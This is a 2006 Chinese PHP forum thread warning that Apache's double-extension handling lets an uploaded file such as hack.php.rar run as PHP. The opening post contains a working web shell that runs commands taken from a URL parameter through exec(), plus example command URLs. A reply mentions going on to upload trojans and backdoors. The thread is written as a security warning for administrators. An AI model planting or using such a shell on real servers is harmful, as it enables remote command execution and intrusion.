论坛徽章:: 0

电梯直达

1楼 [收藏(0)] [报告]

发表于 2006-12-19 15:16 |只看该作者 |倒序浏览

特别是代上传功能的应用。
如果你是把上传的文件统一改名了还好。

如果没有改名。那么就危险拉。
如果他上传jpg,gif,zip还好说拉。如果他上一个 hack.php.rar 那么就轻松拿到你的web sheel 拉。

测试代码：

<?
if($_GET[comm]!='')
{
exec($_GET[comm],$re);
foreach($re as $v)
echo $v.'<br>';
}
else
exit('Please input command...');
?>

复制代码

以上代码另存为test.php.rar

测试代码：
http://localhost:/test.php.rar?comm=netstat -n

http://localhost:/test.php.rar?comm=ps -A

http://localhost:/test.php.rar?comm=ls

文库|博客

yueliangdao0608

广告杀手

论坛徽章:: 0

2楼 [报告]

发表于 2006-12-19 16:19 |只看该作者

人家不给你EXEC权限。上了也没用。

实战分享：从技术角度谈机器学习入门| 【大话IT】RadonDB低门槛向MySQL集群下战书 | ChinaUnix打赏功能已上线！ | 新一代分布式关系型数据库RadonDB知多少？

ocheers

白手起家

论坛徽章:: 0

3楼 [报告]

发表于 2006-12-19 16:44 |只看该作者

就看管理员水平拉。我说出来是要引起大家小心。

这样的危险是完全可以避免的。

实战分享：从技术角度谈机器学习入门| 【大话IT】RadonDB低门槛向MySQL集群下战书 | ChinaUnix打赏功能已上线！ | 新一代分布式关系型数据库RadonDB知多少？

ocheers

白手起家

论坛徽章:: 0

4楼 [报告]

发表于 2006-12-19 16:47 |只看该作者

原帖由 yueliangdao0608 于 2006-12-19 16:19 发表
人家不给你EXEC权限。上了也没用。

当然服务器有safe模式就可避免很多安全隐患。
但是我上一个web上传工具。再通过工具上一系列小黑工具木马后门，有用没用慢慢玩。这个就有危险拉。所以我拿出来说，让大家小心。

[ 本帖最后由 ocheers 于 2006-12-19 16:48 编辑 ]

实战分享：从技术角度谈机器学习入门| 【大话IT】RadonDB低门槛向MySQL集群下战书 | ChinaUnix打赏功能已上线！ | 新一代分布式关系型数据库RadonDB知多少？

返回列表

Chinaunix › 论坛 › 程序设计 › PHP › 在说php apache后缀漏洞

在说php apache后缀漏洞 [复制链接]

浏览过的版块